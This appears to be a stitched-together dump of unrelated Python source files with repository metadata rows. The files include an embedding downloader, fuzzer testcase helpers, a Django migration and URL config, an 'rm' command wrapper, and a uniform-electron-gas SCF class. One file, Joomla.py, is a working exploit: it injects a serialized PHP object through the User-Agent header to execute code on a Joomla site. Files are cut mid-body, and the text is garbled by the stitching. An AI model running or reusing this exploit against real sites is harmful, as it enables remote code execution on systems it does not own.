raise AttributeError
def touch_value(self, key, expire):
"""Touch value for the given key. (optional)"""
raise AttributeError
def asyncio_binary_classifier(f):
c = Callable(f)
return int(bool(c.is_coroutine))
def create_factory_proxy(proxy_base, classifier, factory_table):
proxy_class = type(
'ring.create_factory_proxy.<locals>._FactoryProxy', (proxy_base,), {})
proxy_class.classifier = staticmethod(classifier)
proxy_class.factory_table = staticmethod(factory_table)
sample_factory = factory_table[0]
proxy_class.__call__ = functools.wraps(sample_factory)(proxy_class.__call__)
proxy_class.__doc__ = sample_factory.__doc__
return proxy_class
class FactoryProxyMetaclass(type):
def __repr__(cls):
factory_table_body = ', '.join(
'{i}: {factory.__module__}.{factory.__name__}'.format(
i=i, factory=factory)
for i, factory in enumerate(cls.factory_table))
factory_table = '{' + factory_table_body + '}'
f = '<{cls.__base__.__name__} subclass with (' \
'factory_table={factory_table}, ' \
'classifier={cls.classifier.__module__}.{classifier})>'
return f.format(
cls=cls,
factory_table=factory_table, classifier=qualname(cls.classifier))
class FactoryProxyBase(six.with_metaclass(FactoryProxyMetaclass, object)):
classifier = None # must be set in descendant
factory_table = None # must be set in descendant
def __init__(self, *args, **kwargs):
self.pargs = args, kwargs
self.rings = {}
def __call__(self, func):
key = self.classifier(func)
if key not in self.rings:
factory = self.factory_table[key]
args, kwargs = self.pargs
ring = factory(*args, **kwargs)
self.rings[key] = factory
else:
ring = self.rings[key]
return ring(func)
def __repr__(self):
return u'{cls.__name__}(*{args}, **{kwargs})'.format(
cls=type(self),
args=repr(self.pargs[0]), kwargs=repr(self.pargs[1]))
| 36.053039 | 106 | 0.648094 |
79553202bd943a3745bcce095b9a9a6b3e58c3a1 | 4,307 | py | Python | word_knn/nlpl_retriever.py | rom1504/word-knn | 56cb113a8f843eaafec6200ec5ed6e88876edf12 | [
"MIT"
] | 4 | 2019-08-26T11:52:23.000Z | 2020-08-10T17:52:40.000Z | word_knn/nlpl_retriever.py | rom1504/word-knn | 56cb113a8f843eaafec6200ec5ed6e88876edf12 | [
"MIT"
] | 5 | 2019-08-26T00:20:36.000Z | 2020-08-10T12:37:51.000Z | word_knn/nlpl_retriever.py | rom1504/word-knn | 56cb113a8f843eaafec6200ec5ed6e88876edf12 | [
"MIT"
] | 1 | 2020-10-08T20:56:14.000Z | 2020-10-08T20:56:14.000Z | import numpy as np
import os.path
import os
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
from word_knn.closest_words import inverse_dict
from word_knn.closest_words import ClosestWords
from word_knn.closest_words import build_knn_index
from pathlib import Path
home = str(Path.home())
def csv_to_embeddings_and_dict(input_file):
d = dict()
def read_func(iter):
next(iter) # skip first row
for i, line in enumerate(iter):
if isinstance(line, str):
stripped_line = line.rstrip()
else:
stripped_line = line.decode("utf-8", "ignore").rstrip()
line = stripped_line.split(" ")
word = line[0].split("_")[0]
d[i] = word.replace("::", " ")
line.pop(0)
for item in line:
yield float(item)
csv_to_embeddings_and_dict.rowlength = len(line)
def iter_func():
csv_to_embeddings_and_dict.rowlength = 0
if isinstance(input_file, str):
with open(input_file, "r") as infile:
yield from read_func(infile)
else:
yield from read_func(input_file)
data = np.fromiter(iter_func(), dtype=float)
embeddings = data.reshape((-1, csv_to_embeddings_and_dict.rowlength)).astype(np.float32)
inv_d = inverse_dict(d)
return embeddings, d, inv_d
def csv_to_dict(input_file):
d = dict()
def read(iter):
next(iter) # skip first row
for i, line in enumerate(iter):
line = line.rstrip().split("_")
d[i] = line[0].replace("::", " ")
if isinstance(input_file, str):
with open(input_file, "r") as infile:
read(infile)
else:
read(input_file)
inv_d = inverse_dict(d)
return d, inv_d
def sizeof_fmt(num, suffix="B"):
for unit in ["", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"]:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, "Yi", suffix)
def from_csv(input_file, keep_embeddings=True):
embeddings, word_dict, inverse_word_dict = csv_to_embeddings_and_dict(input_file)
knn_index = build_knn_index(embeddings)
if not keep_embeddings:
embeddings = None
return ClosestWords(embeddings, inverse_word_dict, word_dict, knn_index)
def from_csv_or_cache(word_embedding_dir, input_file=None, keep_embeddings=False):
if input_file is None:
input_file = word_embedding_dir + "/model.txt"
if os.path.exists(word_embedding_dir + "/word_dict.pkl"):
return ClosestWords.from_disk_cache(word_embedding_dir)
closest_words = from_csv(input_file, True)
closest_words.cache_to_disk(word_embedding_dir)
if not keep_embeddings:
del closest_words.embeddings
return closest_words
def from_nlpl(root_word_embedding_dir=home + "/embeddings", embedding_id="0", save_zip=False, keep_embeddings=False):
word_embedding_dir = root_word_embedding_dir + "/" + embedding_id
if not os.path.exists(word_embedding_dir):
os.makedirs(word_embedding_dir)
if os.path.exists(word_embedding_dir + "/word_dict.pkl"):
return ClosestWords.from_disk_cache(word_embedding_dir, keep_embeddings)
zip_file_path = word_embedding_dir + "/model.zip"
if not os.path.exists(word_embedding_dir + "/model.txt"):
if os.path.exists(zip_file_path):
zipfile = ZipFile(zip_file_path, "r")
else:
url = "http://vectors.nlpl.eu/repository/11/" + embedding_id + ".zip"
resp = urlopen(url)
length = resp.getheader("content-length")
print("Downloading " + url + " (" + sizeof_fmt(int(length)) + ")")
content = resp.read()
del resp
if save_zip:
file = open(word_embedding_dir + "/model.zip", "wb")
file.write(content)
file.close()
the_bytes = BytesIO(content)
zipfile = ZipFile(the_bytes)
del content
del the_bytes
zipfile.extract("model.txt", word_embedding_dir)
zipfile.close()
return from_csv_or_cache(word_embedding_dir, open(word_embedding_dir + "/model.txt", "rb"), keep_embeddings)
| 33.913386 | 117 | 0.634781 |
795532ff7863d1dba1002c4c2018f001506c65cc | 5,653 | py | Python | testcase_helpers.py | freingruber/JavaScript-Raider | d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0 | [
"Apache-2.0"
] | 91 | 2022-01-24T07:32:34.000Z | 2022-03-31T23:37:15.000Z | testcase_helpers.py | zeusguy/JavaScript-Raider | d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0 | [
"Apache-2.0"
] | null | null | null | testcase_helpers.py | zeusguy/JavaScript-Raider | d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0 | [
"Apache-2.0"
] | 11 | 2022-01-24T14:21:12.000Z | 2022-03-31T23:37:23.000Z | # Copyright 2022 @ReneFreingruber
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import native_code.speed_optimized_functions as speed_optimized_functions
def get_first_codeline_which_contains_token(content, token):
for codeline in content.split("\n"):
if token in codeline:
return codeline.strip()
return None # token not found
# Line numbers start at 0 (and not at 1)!
# So line_number 1 means line 2
def content_offset_to_line_number(lines, offset):
line_number = 0
current_offset = 0
for line in lines:
offset_at_end_of_line = current_offset + len(line)
# print("Offset at end of line %d is 0x%x" % (line_number, offset_at_end_of_line))
if offset <= offset_at_end_of_line:
return line_number
current_offset = offset_at_end_of_line + 1 # +1 for the newline
line_number += 1
return None # bug, should not occur
# If a testcase has "var_1_" and "var_3_" but no "var_2_"
# This function will rename all "var_3_" occurrences to "var_2_"
def ensure_all_variable_names_are_contiguous(code):
return _ensure_all_token_names_are_contiguous("var_%d_", code)
def ensure_all_function_names_are_contiguous(code):
return _ensure_all_token_names_are_contiguous("func_%d_", code)
def ensure_all_class_names_are_contiguous(code):
return _ensure_all_token_names_are_contiguous("cl_%d_", code)
def _ensure_all_token_names_are_contiguous(token, code):
max_number_of_variables = 1000 # assuming that all testcases have less than 1000 variable names
variable_in_use = [False] * max_number_of_variables
next_token_id = 1
# Check which tokens are in-use
for idx in range(max_number_of_variables):
variable_id = idx + 1
token_name = token % idx
if token_name in code:
new_token_name = token % next_token_id
next_token_id += 1
if new_token_name == token_name:
pass # nothing to do
else:
# they are different, e.g. token_name has a higher token ID, so change it
code = code.replace(token_name, new_token_name)
return code
def get_highest_variable_token_id(code):
max_number_of_variables = 1000 # assuming that all testcases have less than 1000 variable names
highest = 1
for idx in range(max_number_of_variables):
variable_id = idx + 1
token_name = "var_%d_" % idx
if token_name in code:
highest = variable_id
return highest
def remove_numbers_from_testcase(code):
for number in range(0, 9 + 1):
code = code.replace(str(number), "") # remove all numbers
return code
def remove_strings_from_testcase(code):
original_code = code
fixed_code = ""
while True:
# Try to remove "-strings
idx = speed_optimized_functions.get_index_of_next_symbol_not_within_string(code, '"')
if idx != -1:
# testcase contains a "-string
part1 = code[:idx + 1] # everything including the " symbol
rest = code[idx + 1:]
idx2 = speed_optimized_functions.get_index_of_next_symbol_not_within_string(rest, '"')
if idx2 == -1:
# should not occur, it means number of " symbols is not even
# just return original code because there was maybe a flaw in testcase rewriting
return original_code
part2 = rest[idx2 + 1:]
fixed_code += part1 + '"'
code = part2
continue
# Try to remove '-strings
idx = speed_optimized_functions.get_index_of_next_symbol_not_within_string(code, "'")
if idx != -1:
# testcase contains a '-string
part1 = code[:idx + 1] # everything including the ' symbol
rest = code[idx + 1:]
idx2 = speed_optimized_functions.get_index_of_next_symbol_not_within_string(rest, "'")
if idx2 == -1:
# should not occur, it means number of ' symbols is not even
# just return original code because there was maybe a flaw in testcase rewriting
return original_code
part2 = rest[idx2 + 1:]
fixed_code += part1 + "'"
code = part2
continue
# Try to remove `-strings
idx = speed_optimized_functions.get_index_of_next_symbol_not_within_string(code, "`")
if idx != -1:
# testcase contains a '-string
part1 = code[:idx + 1] # everything including the ` symbol
rest = code[idx + 1:]
idx2 = speed_optimized_functions.get_index_of_next_symbol_not_within_string(rest, "`")
if idx2 == -1:
# should not occur, it means number of ` symbols is not even
# just return original code because there was maybe a flaw in testcase rewriting
return original_code
part2 = rest[idx2 + 1:]
fixed_code += part1 + '`'
code = part2
continue
break # if this point is reached no strings are found
return fixed_code + code
| 37.939597 | 100 | 0.651866 |
79553365ec6009dc4c9b0a3d048c144940716e6f | 552 | py | Python | follow/migrations/0003_alter_follow_created_alter_request_created.py | CMPUT404W22AMNRY/CMPUT404-project-socialdistribution | 61d5c8aa2c7f038c137fc86c8b194d92a33d90e3 | [
"W3C-20150513"
] | 1 | 2022-01-14T04:37:54.000Z | 2022-01-14T04:37:54.000Z | follow/migrations/0003_alter_follow_created_alter_request_created.py | CMPUT404W22AMNRY/CMPUT404-project-socialdistribution | 61d5c8aa2c7f038c137fc86c8b194d92a33d90e3 | [
"W3C-20150513"
] | 88 | 2022-02-19T00:16:44.000Z | 2022-03-29T03:05:08.000Z | follow/migrations/0003_alter_follow_created_alter_request_created.py | CMPUT404W22AMNRY/CMPUT404-project-socialdistribution | 61d5c8aa2c7f038c137fc86c8b194d92a33d90e3 | [
"W3C-20150513"
] | null | null | null | # Generated by Django 4.0.2 on 2022-03-04 18:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('follow', '0002_request_title'),
]
operations = [
migrations.AlterField(
model_name='follow',
name='created',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='request',
name='created',
field=models.DateTimeField(auto_now_add=True),
),
]
| 23 | 58 | 0.583333 |
795534b194f33c2421c3754ea55c88ae749e12ae | 631 | py | Python | lib/celcius/unix/commands/rm.py | claymcleod/celcius | e46a3c1ba112af9de23360d1455ab1e037a38ea1 | [
"MIT"
] | 4 | 2016-01-15T22:34:24.000Z | 2016-06-02T06:38:47.000Z | lib/celcius/unix/commands/rm.py | claymcleod/celcius | e46a3c1ba112af9de23360d1455ab1e037a38ea1 | [
"MIT"
] | null | null | null | lib/celcius/unix/commands/rm.py | claymcleod/celcius | e46a3c1ba112af9de23360d1455ab1e037a38ea1 | [
"MIT"
] | null | null | null | class rm(object):
"""Class for wrapping UNIX 'rm' command"""
basecommand = 'rm'
def __init__(self, filename=''):
self.options = []
self.filename = filename
def add_option(self, option):
self.options.append(option)
def build_command(self):
command_bits = []
command_bits.append(self.basecommand)
if self.options != []:
command_bits.append(' '.join(self.options))
command_bits.append(self.filename)
return ' '.join(command_bits)
def build_force_rm_command(filename):
cmd = rm(filename)
cmd.add_option("-f")
return cmd
| 23.37037 | 55 | 0.613312 |
795534fbbc8d1fff9e0542ea332b16b8a748273b | 1,023 | py | Python | awarding/urls.py | amtesire/Project-Awards | 3728e3b5d9c1a89949101bef301fdd9b51d4fd7e | [
"MIT"
] | null | null | null | awarding/urls.py | amtesire/Project-Awards | 3728e3b5d9c1a89949101bef301fdd9b51d4fd7e | [
"MIT"
] | null | null | null | awarding/urls.py | amtesire/Project-Awards | 3728e3b5d9c1a89949101bef301fdd9b51d4fd7e | [
"MIT"
] | null | null | null | """awarding URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'',include('award.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
#url(r'^logout/$', views.logout, {"next_page": '/'}),
url(r'^tinymce/', include('tinymce.urls')),
]
| 37.888889 | 79 | 0.690127 |
795534fc82f354ea40d5f086736721253f2d64b3 | 3,444 | py | Python | sling/nlp/parser/tools/viewmodel.py | SasCezar/sling | 809e21a9986d2522d5014b5836ba222498c099a2 | [
"Apache-2.0"
] | null | null | null | sling/nlp/parser/tools/viewmodel.py | SasCezar/sling | 809e21a9986d2522d5014b5836ba222498c099a2 | [
"Apache-2.0"
] | null | null | null | sling/nlp/parser/tools/viewmodel.py | SasCezar/sling | 809e21a9986d2522d5014b5836ba222498c099a2 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Utility to inspect and print training details saved in a flow file.
import os
import pickle
import sling
import sling.flags as flags
import sling.myelin.flow as flow
import sys
# Needed by pickle to load the data back.
sys.path.insert(0, 'sling/nlp/parser/trainer')
import trainer as trainer
# Prints evaluation metrics.
def print_metrics(header, metrics):
print "\n", header, "metrics"
print "-" * (len(header) + len("metrics") + 1)
for metric in ['SPAN', 'FRAME', 'TYPE', 'ROLE', 'SLOT']:
for name in ['Precision', 'Recall', 'F1']:
key = metric + "_" + name
print " %s: %f" % (key, metrics[key])
print
if __name__ == '__main__':
flags.define('--flow',
help='Flow file',
default='',
type=str,
metavar='FLOW')
flags.define('--strip',
help='Output flow file which drops "dev" blobs',
default='',
type=str,
metavar='FLOW')
flags.define('--training_details',
help='Print training details or not',
default=False,
action='store_true')
flags.define('--output_commons',
help='Output file to store commons',
default='',
type=str,
metavar='FILE')
flags.parse()
assert os.path.exists(flags.arg.flow), flags.arg.flow
f = flow.Flow()
f.load(flags.arg.flow)
if flags.arg.training_details:
details = f.blobs.get('training_details', None)
if not details:
print 'No training details in the flow file.'
else:
dictionary = pickle.loads(details.data)
print 'Hyperparams:\n', dictionary['hyperparams'], '\n'
print 'Number of examples seen:', dictionary['num_examples_seen']
(final_loss, final_count) = dictionary['losses'][-1]['total']
print 'Final loss', (final_loss / final_count)
metrics = dictionary['checkpoint_metrics']
slot_f1 = [metric["SLOT_F1"] for metric in metrics]
best_index = max(enumerate(slot_f1), key=lambda x:x[1])[0]
if best_index == len(slot_f1) - 1:
print_metrics('Best (= final)', metrics[best_index])
else:
print_metrics('Final', metrics[-1])
print_metrics('Best', metrics[best_index])
if flags.arg.output_commons:
data = f.blobs['commons'].data
with open(flags.arg.output_commons, 'wb') as outfile:
outfile.write(data)
print len(data), 'bytes written to', flags.arg.output_commons
if flags.arg.strip:
count = 0
for name in list(f.blobs.keys()):
blob = f.blobs[name]
if 'dev' in blob.attrs:
f.blobs.pop(name)
count += 1
f.save(flags.arg.strip)
print count, 'blobs removed, flow output to', flags.arg.strip
| 33.115385 | 80 | 0.618757 |
795536438222ae6349b72511ed5dbd270a198659 | 234 | py | Python | Code/Python-Current/Support/SupportUtils.py | Coltonton/Custom-Car-Dashboard | 7719cf806e471857ae451ff030236ca57f5e76ce | [
"MIT"
] | 3 | 2021-07-22T09:45:56.000Z | 2022-01-05T09:09:53.000Z | Code/Python-Current/Support/SupportUtils.py | Coltonton/Custom-Car-Dashboard | 7719cf806e471857ae451ff030236ca57f5e76ce | [
"MIT"
] | null | null | null | Code/Python-Current/Support/SupportUtils.py | Coltonton/Custom-Car-Dashboard | 7719cf806e471857ae451ff030236ca57f5e76ce | [
"MIT"
] | null | null | null | from datetime import datetime
debugMSGs = 1
def printDebug(msg):
if debugMSGs == 1:
now = datetime.now()
debugtime = now.strftime("%m/%d %I:%M.%S")
print("[{}]: {}".format(debugtime, msg))#] #Debug Msg () | 26 | 64 | 0.57265 |
7955364c4a6740566ce23c36f3de7f2ee660f6aa | 949 | py | Python | Joomla/验证Joomla是否存在反序列化漏洞的脚本/Joomla.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Joomla/验证Joomla是否存在反序列化漏洞的脚本/Joomla.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Joomla/验证Joomla是否存在反序列化漏洞的脚本/Joomla.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/python
# coding=utf-8
# author:KuuKi
#python joomla.py http://example.com/
import urllib2
import cookielib,sys
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
urllib2.socket.setdefaulttimeout(10)
ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
req = urllib2.Request(url=sys.argv[1],headers={'User-Agent':ua})
opener.open(req)
req = urllib2.Request(url=sys.argv[1])
if 'SERVER["REMOTE_ADDR"]' in opener.open(req).read():
print "vulnerable!" | 49.947368 | 450 | 0.710221 |
7955376f507937ae76a45faeefcd8afd6477d70f | 22,630 | py | Python | kelvin/ueg_scf_system.py | MoleOrbitalHybridAnalyst/kelvin | 99538f8360975e2f80941446d8fbf2e848f74cf9 | [
"MIT"
] | null | null | null | kelvin/ueg_scf_system.py | MoleOrbitalHybridAnalyst/kelvin | 99538f8360975e2f80941446d8fbf2e848f74cf9 | [
"MIT"
] | null | null | null | kelvin/ueg_scf_system.py | MoleOrbitalHybridAnalyst/kelvin | 99538f8360975e2f80941446d8fbf2e848f74cf9 | [
"MIT"
] | null | null | null | import logging
import numpy
from pyscf import lib
from cqcpy import ft_utils
from cqcpy.ov_blocks import one_e_blocks
from cqcpy.ov_blocks import two_e_blocks
from cqcpy.ov_blocks import two_e_blocks_full
from .system import System
from .ueg_utils import UEGBasis
einsum = lib.einsum
#einsum = einsum
class UEGSCFSystem(System):
"""The uniform electron gas in a plane-wave basis set.
Attributes:
T (float): Temperature.
L (float): Box-length.
basis: UEG plane-wave basis set.
mu (float): Chemical potential.
Na (float): Number of alpha electrons.
Nb (float): Number of beta electrons.
N (float): Total number of electrons.
den (float): Number density.
rs (float): Wigner-Seitz radius.
Ef (float): Fermi-energy (of non-interacting system).
Tf (float): Redued temperature.
"""
def __init__(self, T, L, Emax, mu=None, na=None, nb=None,
norb=None, orbtype='u', madelung=None, naref=None):
self.T = T
self.L = L
self.basis = UEGBasis(L, Emax, norb=norb)
# compute mu if N is specified
if na is not None:
self.Na = na
self.Nb = nb
assert(na > 0)
assert(nb > 0)
mua = self.basis.Es[self.Na - 1] + 0.00001
mub = self.basis.Es[self.Nb - 1] + 0.00001
assert(mua == mub)
self.mu = mua
assert(self.T == 0.0)
else:
assert(nb is None)
assert(mu is not None)
self.mu = mu
# store orbital occupations as numpy ranges
d0 = numpy.asarray(self.basis.Es)
n = d0.shape[0]
if naref is not None:
occ = [i for i in range(naref)]
vir = [i + naref for i in range(n - naref)]
self.oidx = numpy.r_[occ]
self.vidx = numpy.r_[vir]
else:
occ = []
vir = []
for p, d in enumerate(d0):
if d < self.mu:
occ.append(p)
if d > self.mu:
vir.append(p)
self.oidx = numpy.r_[occ]
self.vidx = numpy.r_[vir]
for p, d in enumerate(d0):
if d < self.mu:
occ.append(p + n)
if d > self.mu:
vir.append(p + n)
self.goidx = numpy.r_[occ]
self.gvidx = numpy.r_[vir]
# now get real occupations if necessary
if na is None:
assert(nb is None)
en = self.g_energies_tot()
beta = 1.0 / self.T if self.T > 0.0 else 1.0e20
fo = ft_utils.ff(beta, en, self.mu)
N = fo.sum()
self.Na = N/2.0
self.Nb = self.Na
# save some parameters
self.N = self.Na + self.Nb
self.den = self.N/(L*L*L)
self.rs = (3/(4.0*numpy.pi*self.den))**(1.0/3.0)
pi2 = numpy.pi*numpy.pi
self.Ef = 0.5*(3.0*pi2*self.den)**(2.0/3.0)
self.Tf = self.T / self.Ef
self.orbtype = orbtype
self.madelung = madelung
self._mconst = 2.837297479 / (2*self.L)
def has_g(self):
return True
def has_u(self):
return (False if self.orbtype == 'g' else True)
def has_r(self):
return (True if self.orbtype == 'r' else False)
def verify(self, T, mu):
if T > 0.0:
s = T == self.T and mu == self.mu
else:
s = T == self.T
if not s:
return False
else:
return True
def const_energy(self):
if self.madelung == 'const':
return -(self.Na + self.Nb)*self._mconst
else:
return 0.0
def get_mp1(self):
if self.has_u():
if self.T > 0:
Va, Vb, Vabab = self.u_aint_tot()
beta = 1.0 / self.T
ea, eb = self.u_energies_tot()
foa = ft_utils.ff(beta, ea, self.mu)
fob = ft_utils.ff(beta, eb, self.mu)
tmat = self.r_hcore()
E1_1 = einsum('ii,i->', tmat - numpy.diag(ea), foa)
E1_1 += einsum('ii,i->', tmat - numpy.diag(eb), fob)
E1_2 = 0.5*einsum('ijij,i,j->', Va, foa, foa)
E1_2 += 0.5*einsum('ijij,i,j->', Vb, fob, fob)
E1_2 += einsum('ijij,i,j->', Vabab, foa, fob)
return E1_2 + E1_1
else:
Va, Vb, Vabab = self.u_aint()
E1 = -0.5*numpy.einsum('ijij->', Va.oooo)
E1 -= 0.5*numpy.einsum('ijij->', Vb.oooo)
E1 -= numpy.einsum('ijij->', Vabab.oooo)
return E1
else:
if self.T > 0:
V = self.g_aint_tot()
beta = 1.0 / self.T
en = self.g_energies_tot()
tmat = self.g_hcore()
fo = ft_utils.ff(beta, en, self.mu)
E1_1 = einsum('ii,i->', tmat - numpy.diag(en), fo)
E1_2 = 0.5*einsum('ijij,i,j->', V, fo, fo)
return E1_2 + E1_1
else:
V = self.g_aint()
return -0.5*einsum('ijij->', V.oooo)
def u_d_mp1(self, dveca, dvecb):
if self.T > 0:
Va, Vb, Vabab = self.u_aint_tot()
beta = 1.0 / self.T
ea, eb = self.u_energies_tot()
foa = ft_utils.ff(beta, ea, self.mu)
fva = ft_utils.ffv(beta, ea, self.mu)
veca = dveca*foa*fva
fob = ft_utils.ff(beta, eb, self.mu)
fvb = ft_utils.ffv(beta, eb, self.mu)
vecb = dvecb*fob*fvb
tmat = self.r_hcore()
D = -einsum('ii,i->', tmat - numpy.diag(ea), veca)
D += -einsum('ii,i->', tmat - numpy.diag(eb), vecb)
D += -einsum('ijij,i,j->', Va, veca, foa)
D += -einsum('ijij,i,j->', Vb, vecb, fob)
D += -einsum('ijij,i,j->', Vabab, veca, fob)
D += -einsum('ijij,i,j->', Vabab, foa, vecb)
return D
else:
logging.warning("Derivative of MP1 energy is zero at OK")
return 0.0
def u_mp1_den(self):
if self.T > 0:
Va, Vb, Vabab = self.u_aint_tot()
beta = 1.0 / self.T
ea, eb = self.u_energies_tot()
foa = ft_utils.ff(beta, ea, self.mu)
fva = ft_utils.ffv(beta, ea, self.mu)
veca = foa*fva
fob = ft_utils.ff(beta, eb, self.mu)
fvb = ft_utils.ffv(beta, eb, self.mu)
vecb = fob*fvb
tmat = self.r_hcore()
Da = -beta*einsum('ii,i->i', tmat - numpy.diag(ea), veca)
Db = -beta*einsum('ii,i->i', tmat - numpy.diag(eb), vecb)
Da += -beta*einsum('ijij,i,j->i', Va, veca, foa)
Db += -beta*einsum('ijij,i,j->i', Vb, vecb, fob)
Da += -beta*einsum('ijij,i,j->i', Vabab, veca, fob)
Db += -beta*einsum('ijij,i,j->j', Vabab, foa, vecb)
return Da, Db
else:
logging.warning("Derivative of MP1 energy is zero at OK")
return 0.0
def g_d_mp1(self, dvec):
if self.T > 0:
V = self.g_aint_tot()
beta = 1.0 / self.T
en = self.g_energies_tot()
fo = ft_utils.ff(beta, en, self.mu)
fv = ft_utils.ffv(beta, en, self.mu)
vec = dvec*fo*fv
tmat = self.g_hcore()
E1_2 = -einsum('ijij,i,j->', V, vec, fo)
E1_1 = -einsum('ii,i->', tmat - numpy.diag(en), vec)
return E1_2 + E1_1
else:
logging.warning("Derivative of MP1 energy is zero at OK")
return 0.0
def g_mp1_den(self):
if self.T > 0:
V = self.g_aint_tot()
beta = 1.0 / self.T
en = self.g_energies_tot()
fo = ft_utils.ff(beta, en, self.mu)
fv = ft_utils.ffv(beta, en, self.mu)
vec = fo*fv
tmat = self.g_hcore()
E1_2 = -beta*einsum('ijij,i,j->i', V, vec, fo)
E1_1 = -beta*einsum('ii,i->i', tmat - numpy.diag(en), vec)
return E1_1 + E1_2
else:
logging.warning("Derivative of MP1 energy is zero at OK")
return numpy.zeros((self.g_energies_tot().shape))
def r_energies(self):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
if self.Na != self.Nb:
raise Exception("UEG system is not restricted")
F = self.r_fock()
na = int(self.Na)
assert(na == int(self.Nb))
eo = F.oo.diagonal()
ev = F.vv.diagonal()
if self.madelung == "orb":
eo -= self._mconst
return (eo, ev)
def u_energies(self):
fa, fb = self.u_fock()
eoa = fa.oo.diagonal()
eva = fa.vv.diagonal()
eob = fb.oo.diagonal()
evb = fb.vv.diagonal()
if self.madelung == "orb":
eoa -= self._mconst
eob -= self._mconst
return (eoa, eva, eob, evb)
def g_energies(self):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
d = self.g_energies_tot()
nbsf = self.basis.get_nbsf()
na = int(self.Na)
nb = int(self.Nb)
eoa = d[:na]
eva = d[na:nbsf]
eob = d[nbsf:nbsf+nb]
evb = d[-(nbsf-nb):]
eo = numpy.hstack((eoa, eob))
ev = numpy.hstack((eva, evb))
if self.madelung == "orb":
eo -= self._mconst
return (eo, ev)
def r_energies_tot(self):
e = numpy.asarray(self.basis.Es)
n = e.shape[0]
V = self.r_int_tot()
Vd = V[numpy.ix_(numpy.arange(n), self.oidx,
numpy.arange(n), self.oidx)]
Vx = V[numpy.ix_(numpy.arange(n), self.oidx,
self.oidx, numpy.arange(n))]
e += 2*numpy.einsum('pipi->p', Vd) - numpy.einsum('piip->p', Vx)
return e
def u_energies_tot(self):
e = self.r_energies_tot()
return e, e.copy()
def g_energies_tot(self):
ea, eb = self.u_energies_tot()
return numpy.hstack((ea, eb))
def r_fock(self):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
F = self.r_hcore()
V = self.r_int_tot()
n = F.shape[0]
Vd = V[numpy.ix_(numpy.arange(n), self.oidx,
numpy.arange(n), self.oidx)]
Vx = V[numpy.ix_(numpy.arange(n), self.oidx,
self.oidx, numpy.arange(n))]
F = F + 2*einsum('piri->pr', Vd) - einsum('piir->pr', Vx)
Foo = F[numpy.ix_(self.oidx, self.oidx)]
Fvv = F[numpy.ix_(self.vidx, self.vidx)]
Fov = F[numpy.ix_(self.oidx, self.vidx)]
Fvo = F[numpy.ix_(self.vidx, self.oidx)]
return one_e_blocks(Foo, Fov, Fvo, Fvv)
def u_fock(self):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
F = self.r_hcore()
n = F.shape[0]
oidx = self.oidx
vidx = self.vidx
V = self.r_int_tot()
Vd = V[numpy.ix_(numpy.arange(n), oidx, numpy.arange(n), oidx)]
Vx = V[numpy.ix_(numpy.arange(n), oidx, oidx, numpy.arange(n))]
F = F + 2*einsum('piri->pr', Vd) - einsum('piir->pr', Vx)
Foo = F[numpy.ix_(oidx, oidx)]
Fvv = F[numpy.ix_(vidx, vidx)]
Fov = F[numpy.ix_(oidx, vidx)]
